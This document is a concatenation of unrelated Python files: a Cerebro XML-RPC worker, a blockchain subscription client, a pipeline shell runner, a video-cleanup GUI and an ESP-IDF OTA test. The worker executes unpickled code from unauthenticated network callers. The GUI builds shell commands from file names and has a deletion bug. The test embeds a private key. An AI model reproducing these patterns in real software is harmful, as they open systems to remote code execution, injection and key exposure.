except queue.Empty:
continue
self.log("working", work[0])
self._results[work[0]] = (work[1](), work[2])
self.log("finished", work[0])
|
worker.py
|
# Copyright 2021 Supun Nakandala. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import base64
import sys
import threading
import gc
import traceback
import argparse
from xmlrpc.server import SimpleXMLRPCServer
import dill
data_cache = {}
status_dict = {}
def initialize_worker():
"""
Initialize the worker by resetting the caches
:return:
"""
global data_cache
global status_dict
# del data_cache
# del status_dict
data_cache = {}
status_dict = {}
gc.collect()
def execute(exec_id, code_string, params):
# can execute only one at a time
"""
:param exec_id:
:param code_string:
:param params:
:return:
"""
if len([y for y in status_dict.values() if y["status"] == "RUNNING"]) > 0:
return base64.b64encode(dill.dumps("BUSY"))
else:
func = dill.loads(base64.b64decode(code_string))
def bg_execute(exec_id, func, params):
"""
:param exec_id:
:param func:
:param params:
"""
try:
func_result = func(data_cache, *params)
status_dict[exec_id] = {"status": "COMPLETED", "result": func_result}
except Exception as e:
print(e)
print(traceback.format_exc())
sys.stdout.flush()
status_dict[exec_id] = {"status": "FAILED"}
status_dict[exec_id] = {"status": "RUNNING"}
thread = threading.Thread(target=bg_execute, args=(exec_id, func, params,))
thread.start()
return base64.b64encode(dill.dumps("LAUNCHED"))
def status(exec_id):
"""
:param exec_id:
:return:
"""
if exec_id in status_dict:
return base64.b64encode(dill.dumps(status_dict[exec_id]))
else:
return base64.b64encode(dill.dumps({"status": "INVALID ID"}))
def is_live():
return True
def main():
parser = argparse.ArgumentParser(description='Argument parser for generating model predictions.')
parser.add_argument('--hostname', help='Worker host name', default='0.0.0.0')
parser.add_argument('--port', help='Worker port', default=7777, type=int)
args = parser.parse_args()
print('Starting Cerebro worker on {}:{}'.format(args.hostname, args.port))
server = SimpleXMLRPCServer((args.hostname, args.port), allow_none=True)
server.register_function(execute)
server.register_function(status)
server.register_function(initialize_worker)
server.register_function(is_live)
server.serve_forever()
if __name__ == "__main__":
main()
|
customer.py
|
import web3
import time
import eth_account.messages
import web3.contract
import sys
import socket
from threading import Thread, Lock
from lib import *
from Simple import *
from SimpleValidator import *
import json
from lib import w3
import traceback
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 29290 # Port to listen on (non-privileged ports are > 1023)
class CustomerInterface: # This class is intended for the customer to interact with the blockchain. It doesn't generate any questions, and doesn't interact with the provider.
def __init__(self, address):
self.customer = Customer(address)
self.qas = {}
self.subscription_address = None
def is_subscription_active(self):
return self.customer.is_subscription_active()
def join_subscription(self, subscription_address):
self.customer.join_subscription(subscription_address)
self.subscription_address = subscription_address
def register_question(self, question):
if not self.customer.get_validator().is_valid_question(question):
print("Question invalid!!!")
return False
q_hash = Signer.hash(question)
if q_hash not in self.qas:
self.qas[q_hash] = QA(question)
#print("registerd:",q_hash)
return True
def register_answer(self, question, answer):
if not self.customer.validator.is_answer_correct(question, answer):
print("Tried to register incorrect answer!")
return
q_hash = Signer.hash(question)
done = False
if q_hash not in self.qas:
self.qas[q_hash] = QA(question, answer=answer)
else:
self.qas[q_hash].set_answer(answer)
def get_all_hashes(self):
answered = []
unanswered = []
for qa in self.qas.values():
if qa.is_answered():
answered.append(qa.get_hash())
else:
unanswered.append(qa.get_hash())
return answered + unanswered, len(unanswered)
def get_signed_hashes(self):
hashes, unanswered = self.get_all_hashes()
return hashes, unanswered, self.sign_hashes(hashes, unanswered)
def sign_hashes(self, hashes, unanswered):
return Signer.sign(hashes, unanswered, self.subscription_address, self.customer.address)
def get_answer(self, question):
q_hash = Signer.hash(question)
if q_hash in self.qas:
return self.qas[q_hash].get_answer()
return None
def check_demand(self):
ret = self.customer.check_demand()
if ret is not None:
question, answer = ret
self.register_answer(question, answer)
return ret
def resolve_demand(self):
demand = self.check_demand()
if demand is not None:
hashes, unanswered, signature = self.get_signed_hashes()
print("Providing: ", hashes, unanswered)
self.provide_signature(hashes, unanswered, signature)
return demand
def provide_signature(self, hashes, unanswered, signature=None):
if signature is None:
signature = self.sign_hashes(hashes, unanswered)
try:
self.customer.provide_signature(hashes, unanswered, signature)
except Exception as e:
print("Coudn't provide signature:", e)
traceback.print_tb(e.__traceback__)
def get_all_answers(self):
questions = []
answers = []
for qa in self.qas.values():
if qa.is_answered():
questions.append(qa.get_question())
answers.append(qa.get_answer())
return questions, answers
def appeal(self, question, hashes=None, unanswered=None):
if not self.register_question(question):
print("Couldn't appeal: question not registered")
return False
signature = None
if hashes is None:
hashes, unanswered, signature = self.get_signed_hashes()
else:
signature = self.sign_hashes(hashes, unanswered)
try:
#print("Appealing with:", Coder.str_question(question), hashes, unanswered, signature)
#print(QA(question).get_hash())
if not self.customer.appeal(question, hashes, unanswered, signature):
raise ""
except Exception as e:
print("Couldn't appeal:", e)
traceback.print_tb(e.__traceback__)
return False
return True
def check_appeal(self):
answer = self.customer.check_appeal()
if answer is not None:
answer = answer
self.register_answer(self.customer.get_question_appealed(), answer)
return answer
def withdraw(self):
return self.customer.withdraw()
# Class for interaction between threads and socket thread
class CommandsList():
def __init__(self):
self.commands = []
self.inputs = []
def insert_command(self, msg):
self.commands.append(msg)
def get_last_input(self):
if len(self.inputs) < 1:
return None
ret, self.inputs = self.inputs[-1], self.inputs[:-1]
return ret
def insert_input(self, inp):
self.inputs.append(inp)
def next(self):
if len(self.commands) < 1:
return None
ret, self.commands = self.commands[0], self.commands[1:]
return ret
def handle_socket_customer(host, port, cmd_list, lock, QUIT_MSG):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
s.settimeout(0.2)
while True:
time.sleep(0.1)
inp = None
try:
inp = receive_dict(s)
if inp == None:
#print("CLOSING...")
print("\nSocket connection was closed by provider.")
s.close()
break
except socket.timeout:
pass
except Exception as e:
print(e)
#print("CLOSING...")
s.close()
break
lock.acquire()
try:
if inp is not None:
cmd_list.insert_input(inp)
#print("GOT MSG: ", inp)
msg = cmd_list.next()
finally:
lock.release()
if msg is None:
time.sleep(0.5)
else:
if msg == QUIT_MSG:
print("\nSocket connection was closed by you.")
s.close()
break
#print("SENDING MSG: ", msg)
send_dict(s, msg)
def init_customer(address, host, port):
#provider_int = ProviderInterface(address)
#provider_lock = Lock()
#x = Thread(target=handle_provider, args=(provider_lock, provider_int))
#x.start()
to_join = []
customer_int = CustomerInterface(address)
cmd_list = CommandsList()
lock = Lock()
customer_lock = Lock()
QUIT_MSG = {"close":True}
x = Thread(target=handle_socket_customer, args=(host, port, cmd_list, lock, QUIT_MSG))
x.start()
to_join.append(x)
print("Sending address...")
msg = {"type": "address", "address": str(address)}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Waiting for subscription address...")
while True:
lock.acquire()
try:
msg = cmd_list.get_last_input()
finally:
lock.release()
if msg is not None and "type" in msg and msg["type"] == "subscription" and "address" in msg:
customer_int.join_subscription(msg["address"])
break
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#------------------------------------------------
value = input("Manual customer? (y/n):")
if value == "y":
user_customer(customer_int, cmd_list, lock)
else:
num_of_questions = int(input("How many questions to generate (int):"))
value = input("Manual questions? (y/n):")
user_input = value == "y"
value = input("Should customer send questions to provider (otherwise will appeal)? (y/n):")
only_appeals = not (value == "y")
x = Thread(target=auto_customer_background, args=(customer_int, customer_lock))
x.start()
to_join.append(x)
auto_customer(customer_int, customer_lock, cmd_list, lock, user_input, only_appeals, num_of_questions=num_of_questions)
#------------------------------------------------
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'''
lock.acquire()
try:
cmd_list.insert_command(QUIT_MSG)
finally:
lock.release()
for x in to_join:
x.join()
def user_customer(customer_int, cmd_list, lock):
print("Joined Subscription!\n")
print("Commands:")
print("q - exit")
print("new - register new question and send to provider")
print("check - check for new answers from provider")
print("get - get specific answer if submitted by provider")
print("ackall - sign all answers submitted by provider")
print("appeal - appeal a question")
print("status - check appeal and active")
print("demand - check if provider demanded signature")
print("resolve - resolve provider's signature demand")
print("withdraw - withdraw funds from contract")
while(True):
value = input("$>> ")
if value == "q":
break
elif value == "new":
# register new question and send to provider
print("Input new question:")
try:
question = Solver.input()
except Exception as e:
traceback.print_tb(e.__traceback__)
continue
#print("Got new question:",question)
if not customer_int.register_question(question):
print("Warning: invalid question")
hashes, unanswered, signature = customer_int.get_signed_hashes()
#print("providing: ", hashes, unanswered)
msg = {
"type": "new_question",
"question": Coder.encoded_to_stream(question),
"hashes": bytes_to_str(hashes),
"unanswered": unanswered,
"signature": bytes_to_str(signature)}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Sent question:", Coder.str_question(question))
elif value == "check":
msg = {"type": "send_answer"}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
while True:
time.sleep(0.2)
lock.acquire()
try:
msg = cmd_list.get_last_input()
finally:
lock.release()
if msg is not None:
break
answers = []
questions = []
answers_stream = []
questions_stream = []
if "type" in msg and msg["type"] == "answer" and "answers" in msg and "questions" in msg:
answers_stream = msg["answers"]
questions_stream = msg["questions"]
for i in range(min(len(questions_stream), len(answers_stream))):
answers.append(Coder.stream_to_encoded(answers_stream[i]))
questions.append(Coder.stream_to_encoded(questions_stream[i]))
print("Got answers and questions:")
for i in range(min(len(answers), len(questions))):
answer = answers[i]
question = questions[i]
customer_int.register_answer(question, answer)
print(Coder.str_question(question), "->", Coder.str_answer(answer))
# get next answer from provider
pass
elif value == "get":
# get specific answer
try:
question = Solver.input()
except Exception as e:
traceback.print_tb(e.__traceback__)
continue
answer = customer_int.get_answer(question)
if answer is None:
print("Got no answer yet.")
else:
print("Answer: ", answer)
elif value == "ackall":
# sign all answers submitted by provider
#questions, answers = customer_int.get_all_answers()
hashes, unanswered, signature = customer_int.get_signed_hashes()
msg = {
"type": "ack",
"hashes": bytes_to_str(hashes),
"unanswered": unanswered,
"signature": bytes_to_str(signature)
}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Sent ack for all answers")
elif value == "appeal":
try:
question = Solver.input()
except Exception as e:
traceback.print_tb(e.__traceback__)
continue
if not customer_int.appeal(question):
#print("Couldn't appeal - invalid question.")
pass
elif value == "status":
print("Check appeal status: ", customer_int.check_appeal())
elif value == "demand":
ret = customer_int.check_demand()
if ret is None:
print("No demand from provider.")
else:
print("Provider demanded signature for: ")
question, answer = ret
print(Coder.str_question(question), "->", Coder.str_answer(answer))
elif value == "resolve":
ret = customer_int.resolve_demand()
if ret is None:
print("No demand from provider.")
else:
print("Resolved demand for: ")
question, answer = ret
print(Coder.str_question(question), "->", Coder.str_answer(answer))
elif value == "withdraw":
amount = customer_int.withdraw()
if amount > 0:
print("Withdrew:", amount)
break
else:
print("No funds to withdraw")
else:
print("[x] Unknown command:", value)
def auto_customer(customer_int, customer_lock, cmd_list, lock, user_input=False, only_appeals=False, sending_ack=False, auto_file=False, num_of_questions=3):
# Generate all Questions
questions = []
answers = []
if auto_file:
filename, questions = generate_file_questions(customer_int, customer_lock)
else:
for x in range(num_of_questions):
question = None
if user_input:
print("Input next question:")
try:
question = Solver.input()
except Exception as e:
traceback.print_tb(e.__traceback__)
continue
else:
question = Solver.generate()
questions.append(question)
# Send Questions
for question in questions:
# Register Question
customer_lock.acquire()
try:
customer_int.register_question(question)
#print("registed question")
except Exception as e:
traceback.print_tb(e.__traceback__)
print(e)
finally:
customer_lock.release()
# Announce Question to Provider(?)
if only_appeals:
print("Generated question secretly:", Coder.str_question(question))
else:
customer_lock.acquire()
try:
hashes, unanswered, signature = customer_int.get_signed_hashes()
finally:
customer_lock.release()
msg = {
"type": "new_question",
"question": Coder.encoded_to_stream(question),
"hashes": bytes_to_str(hashes),
"unanswered": unanswered,
"signature": bytes_to_str(signature)}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Generated and sent question:", Coder.str_question(question))
# Wait for Answer from Provider
t = 0
T = 50
if only_appeals:
T = 1
appealed_block = 0
answer = None
ask_again = True
printed_waiting = False
while True:
#print(".")
# Break if inactive
customer_lock.acquire()
try:
active = customer_int.is_subscription_active()
finally:
customer_lock.release()
if not active:
print("Subscription ended, closing main thread.")
break
t += 1
time.sleep(0.1)
answer = None
customer_lock.acquire()
try:
answer = customer_int.get_answer(question)
finally:
customer_lock.release()
if answer is not None:
print("Got answer from demand!")
break
# Appeal Question
if t == T:
print("Appealing question - took too long for provider to respond.")
customer_lock.acquire()
try:
customer_int.appeal(question)
finally:
customer_lock.release()
appealed_block = w3.eth.blockNumber
printed_waiting = False
# Check if Appeal Resolved
if t > T:
customer_lock.acquire()
try:
answer = customer_int.check_appeal()
finally:
customer_lock.release()
if answer is not None:
customer_lock.acquire()
try:
customer_int.register_answer(question, answer)
finally:
customer_lock.release()
print("Appeal resolved by provider!")
break
if only_appeals:
print("Only appeals")
continue
# Ask for Answers from Provider
if ask_again:
#print("asking again")
msg = {"type": "send_answer"}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
ask_again = False
# Receive Answers
msg = None
lock.acquire()
try:
msg = cmd_list.get_last_input()
finally:
lock.release()
if msg is not None:
ask_again = True
else:
continue
answers_ = []
questions_ = []
answers_stream = []
questions_stream = []
if "type" in msg and msg["type"] == "answer" and "answers" in msg and "questions" in msg:
answers_stream = msg["answers"]
questions_stream = msg["questions"]
for i in range(min(len(answers_stream), len(questions_stream))):
answer_ = Coder.stream_to_encoded(answers_stream[i])
question_ = Coder.stream_to_encoded(questions_stream[i])
answers_.append(answer_)
questions_.append(question_)
customer_lock.acquire()
try:
customer_int.register_answer(question_, answer_)
finally:
customer_lock.release()
# Send Ack for Answers
if sending_ack:
# sign all answers submitted by provider
#questions, answers = customer_int.get_all_answers()
customer_lock.acquire()
try:
hashes, unanswered, signature = customer_int.get_signed_hashes()
finally:
customer_lock.release()
msg = {
"type": "ack",
"hashes": bytes_to_str(hashes),
"unanswered": unanswered,
"signature": bytes_to_str(signature)
}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Sent ack for all answers")
if question not in questions_:
if not printed_waiting:
print("question not answered - waiting...")
printed_waiting = True
time.sleep(0.1)
continue
print("Received answer from provider.")
got_correct = False
for i in range(len(questions_)):
if questions_[i] == question:
answer = answers_[i]
ret = False
customer_lock.acquire()
try:
ret = customer_int.customer.validator.is_answer_correct(question, answer)
finally:
customer_lock.release()
if not ret:
if t < T:
print("Answer incorrect!")
t = T-1
else:
got_correct = True
if got_correct:
break
if answer is not None:
print("Got answer: ", Coder.str_answer(answer))
answers.append(answer)
else:
print("Got no answer.")
customer_lock.acquire()
try:
active = customer_int.is_subscription_active()
finally:
customer_lock.release()
if not active:
break
if auto_file:
file = open('./FilesReceived/' + filename, 'wb')
for answer in answers:
answer = Coder.decode_answer(answer)
print(answer)
file.write(answer[1])
file.close()
print("Saved file to ./FilesReceived/" + filename)
if len(answers) < len(questions):
print("File saved is partial - not all answers recevied.")
# Resolve Demands
def auto_customer_background(customer_int, customer_lock):
while True:
active = False
customer_lock.acquire()
try:
active = customer_int.is_subscription_active()
finally:
customer_lock.release()
if not active:
print("Subscription ended, closing background thread.")
break
time.sleep(0.05)
customer_lock.acquire()
try:
ret = customer_int.resolve_demand()
finally:
customer_lock.release()
if not (ret is None):
print("Resolved demand for: ")
question, answer = ret
print(Coder.str_question(question), "->", Coder.str_answer(answer))
customer_lock.acquire()
try:
amount = customer_int.withdraw()
finally:
customer_lock.release()
print("Withdrew funds:", amount)
return
# Generate Queries for all chunks of a File
def generate_file_questions(customer_int, customer_lock):
filename = input("File name:")
customer_lock.acquire()
try:
chunks = customer_int.customer.validator.contract.functions.get_chunks_num(filename).call()
finally:
customer_lock.release()
questions = []
for x in range(chunks):
question = Coder.encode_question([filename, x])
questions.append(question)
return filename, questions
if __name__ == '__main__':
#print(sys.argv)
#print(len(sys.argv))
if(len(sys.argv) < 2):
print("USAGE: <filename> address [port]")
sys.exit()
address = sys.argv[1]
port = PORT
if(len(sys.argv) > 2):
port = int(sys.argv[2])
from main import HOST
init_customer(address, HOST, port)
|
shell.py
|
"""Command execution in bash shells"""
import time
import threading
from mara_pipelines import config
from mara_pipelines.logging import logger
from .logging import SingerTapReadLogThread
def singer_run_shell_command(command: str, log_command: bool = True):
"""
Runs a command in a bash shell and logs the output of the command in (near)real-time according to the
singer specification: https://github.com/singer-io/getting-started/blob/master/docs/SPEC.md#output
Args:
command: The command to run
log_command: When true, then the command itself is logged before execution
Returns:
Either (in order)
- False when the exit code of the command was not 0
- True when there was no output to stdout
- The output to stdout, as an array of lines
"""
import shlex, subprocess, threading
if log_command:
logger.log(command, format=logger.Format.ITALICS)
process = subprocess.Popen(shlex.split(config.bash_command_string()) + ['-c', command],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True)
# keep stdout output
output_lines = []
# unfortunately, only file descriptors and the system stream can be passed to
# subprocess.Popen(..) (and not custom streams without a file handle).
# So in order to see be able to log the output in real-time, we have to
# query the output steams of the process from to separate threads
def read_process_stdout():
for line in process.stdout:
output_lines.append(line)
logger.log(line, format=logger.Format.VERBATIM)
read_stdout_thread = threading.Thread(target=read_process_stdout)
read_stdout_thread.start()
read_singertaplog_thread = SingerTapReadLogThread(process=process)
read_singertaplog_thread.start()
# wait until the process finishes
while process.poll() is None:
time.sleep(0.005)
read_stdout_thread.join()
read_singertaplog_thread.join()
if read_singertaplog_thread.has_error:
logger.log('Singer tap error occured', is_error=True, format=logger.Format.ITALICS)
return False
exitcode = process.returncode
if exitcode != 0:
logger.log(f'exit code {exitcode}', is_error=True, format=logger.Format.ITALICS)
return False
return output_lines or True
|
main.py
|
import os
import subprocess
import sys
import threading
from time import sleep
import tkinter as tk
from tkinter import filedialog
root = tk.Tk()
root.title('视频库清理助手 V0.1.2')
many = int(0)
quit1 = 0
wait1 = 0
continueY = 0
potONorOFF = 0
file_name = '0'
now_dir = '0'
now_name = 0
work_dir = tk.StringVar()
pot_dir = tk.StringVar()
pot_dir.set('C:\\"Program Files"\DAUM\PotPlayer\PotPlayerMini64.exe ')
def control():
def wait_set():
global wait1
wait1 = 1
def quit_set():
global quit1
global continueY
control_window.destroy()
if potONorOFF == 1:
killedPotplayer()
continueY = 1
quit1 = 1
def continue_set():
global continueY
continueY = 1
control_window = tk.Tk()
control_window.title('请选择是否保留')
control_window.geometry('300x150')
control_window.wm_attributes('-topmost', 1)
delete_bt = tk.Button(control_window, text='删除此视频及同名文件', command=delete)
quit_bt = tk.Button(control_window, text='停止筛选视频文件', command=quit_set)
wait_bt = tk.Button(control_window, text='暂停视频筛选', command=wait_set)
continue_bt = tk.Button(control_window, text='继续视频筛选', command=continue_set)
delete_bt.pack()
quit_bt.pack()
wait_bt.pack()
continue_bt.pack()
control_window.mainloop()
def openPotplayer(filename):
global work_dir
global dont_dir
global output_dir
global many
global potONorOFF
potONorOFF = 1
subprocess.call(pot_dir.get() + filename, shell=True)
# os.system(pot_dir.get() + filename)
potONorOFF = 0
def killedPotplayer():
subprocess.call('taskkill /f /im PotPlayerMini64.exe', shell=True)
#os.system('taskkill /f /im PotPlayerMini64.exe')
def mv():
pass
def delete():
os.remove(file_name)
for name in os.listdir(now_dir):
if name.find(now_name[:-3]) != -1 and (name[-3:] != 'mkv' or name[-3:] != 'mp4' or name[-3:] != 'avi'):
os.remove(str(now_dir) + '/' + str(name))
def find():
global work_dir
global now_dir
control_run = threading.Thread(target=control)
control_run.start()
for root, dirs, files in os.walk(work_dir.get()):
now_dir = root
for name in files:
global many
global file_name
global now_name
global wait1
global continueY
global quit1
global continueY
filename = os.path.join(root, name)
if str(filename[-3:]) == 'mp4' or str(filename[-3:]) == 'mkv' or str(filename[-3:]) == 'avi':
now_name = name
file_name = filename
openPotplayer(filename)
many = many + 1
if wait1 == 1:
while continueY == 0:
sleep(0.1)
wait1 = 0
continueY = 0
if quit1 == 1:
break
else:
continue
break
sys.exit()
# 根据工作目录获取文件列表,是否遍历,等,获取文件目录
def set_dir():
global WorkDirPrint
global work_dir
work_dir.set(filedialog.askdirectory())
def set_pot_dir():
global pot_dir
pot_dir.set(filedialog.askopenfilename())
def quit():
sys.exit()
set_dir_bt = tk.Button(root, text='设置工作目录', command=set_dir)
start_bt = tk.Button(root, text='开始筛选视频文件', command=find)
quit_bt = tk.Button(root, text='退出', command=quit)
set_pot_dir_bt = tk.Button(root, text='设置potplayer程序位置', command=set_pot_dir)
WorkDirPrint = tk.Label(root, textvariable=work_dir)
pot_dir_print = tk.Label(root, textvariable=pot_dir)
pot_dir_print.grid(row=0, column=1)
set_pot_dir_bt.grid(row=0, column=0)
set_dir_bt.grid(row=1, column=0)
WorkDirPrint.grid(row=1, column=1)
start_bt.grid(row=2, column=0)
quit_bt.grid(row=2, column=1)
root.mainloop()
# ===========================================================================================
|
example_test.py
|
import re
import os
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
import random
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_native_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("native_ota_example", "examples/system/ota/native_ota_example", dut_class=ttfw_idf.ESP32DUT)
# No. of times working of application to be validated
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = "native_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("native_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("native_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8002))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8002/" + bin_name))
dut1.write("https://" + host_ip + ":8002/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_native_ota_example_truncated_bin(env, extra_data):
